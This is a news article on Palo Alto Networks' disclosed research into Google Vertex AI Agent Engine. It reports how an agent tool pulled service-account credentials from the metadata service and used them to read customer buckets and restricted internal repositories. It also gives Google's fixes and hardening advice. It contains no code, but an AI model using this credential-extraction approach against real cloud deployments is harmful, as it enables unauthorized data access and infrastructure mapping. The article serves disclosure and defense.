Palo Alto Networks research demonstrates how default permissions in Google’s Vertex AI Agent Engine enable unauthorized read access to customer storage buckets and restricted internal repositories.

Palo Alto Networks security researchers have identified vulnerabilities in the permission model of Google Cloud Platform’s Vertex AI Agent Engine. The platform supports the development of autonomous AI agents that integrate with cloud services to execute complex tasks. Analysis of the default configuration for these agents shows that the associated service accounts receive broad permissions, which can be exploited to access sensitive data and internal infrastructure.

The investigation started with the deployment of a test AI agent built using the Google Cloud Application Development Kit. The Per-Project, Per-Product Service Agent (P4SA) created for the deployment, identified as service-<PROJECT-ID>@gcp-sa-aiplatform-re.iam.gserviceaccount.com, included extensive default permissions. When the agent ran, a custom tool queried the instance metadata service. This returned the service account credentials, including project details, identity information and assigned scopes.

Using the extracted credentials, the researchers obtained read access to all Google Cloud Storage buckets in the consumer project — the customer’s own Google Cloud environment. The effective permissions covered storage.buckets.get, storage.buckets.list, storage.objects.get and storage.objects.list. This level of access bypassed intended isolation boundaries and allowed listing and retrieval of data stored in the project’s buckets.

The same credentials also enabled access to restricted Artifact Registry repositories in Google’s producer project, the internal environment hosting Vertex AI services. Repositories such as us-docker.pkg.dev/cloud-aiplatform-private/reasoning-engine and cloud-aiplatform-private/llm-extension/reasoning-engine-py310 became reachable. Container images forming the core of the Vertex AI Reasoning Engine could be downloaded, while standard customer user accounts were denied access. Enumeration via the Artifact Registry API further exposed additional restricted packages and images whose existence was not previously visible to external parties.

Access extended to the tenant project, a dedicated Google-managed environment for the deployed Agent Engine instance. Storage buckets in this project contained deployment files including Dockerfile.zip, code.pkl and requirements.txt. The Dockerfile referenced internal Google Cloud Storage locations, such as gs://reasoning-engine-restricted/versioned_py/Dockerfile.zip, revealing aspects of the service’s underlying infrastructure. The code.pkl file, which serializes the agent’s Python code, uses the pickle module. Official Python documentation warns that deserializing data from untrusted sources with this module can lead to arbitrary code execution; the research noted this as a potential risk although exploitation was outside the study’s scope.

The agent’s default OAuth 2.0 scopes were also found to be broad and non-editable. These scopes could theoretically permit interaction with Google Workspace services such as Gmail, Calendar and Drive, although separate IAM permissions would still be required. Their presence by default deviates from least-privilege principles at the API-access level.

The research team shared the findings with Google. In response, Google updated its official documentation to provide clearer details on how Vertex AI uses resources, accounts and agents. Google also recommended the Bring Your Own Service Account (BYOSA) method, which lets organizations assign a custom service account with narrowly defined permissions instead of relying on the default P4SA. Google confirmed that existing controls prevent the service agent from modifying production images, limiting certain cross-tenant risks.

The study illustrates practical implications of default permission scoping in AI platforms. Overly permissive service accounts can convert an ostensibly helpful agent into a vector for data exfiltration or infrastructure mapping. The combination of service-agent access, internal artifact exposure and insecure serialization formats creates layered risks that may not be immediately apparent during standard deployment. Organizations using Vertex AI are advised to review permission boundaries, adopt custom service accounts where possible, restrict OAuth scopes and perform security validation before production use.

By Jakob Jung

Dr. Jakob Jung is Editor-in-Chief of Security Storage and Channel Germany. He has been working in IT journalism for more than 20 years. His career includes Computer Reseller News, Heise Resale, Informationweek, Techtarget (storage and data center) and ChannelBiz. He also freelances for numerous IT publications, including Computerwoche, Channelpartner, IT-Business, Storage-Insider and ZDnet. His main topics are channel, storage, security, data center, ERP and CRM. Contact via Mail: jakob.jung@security-storage-und-channel-germany.de

Leave a Reply

Your email address will not be published. Required fields are marked *

WordPress Cookie Notice by Real Cookie Banner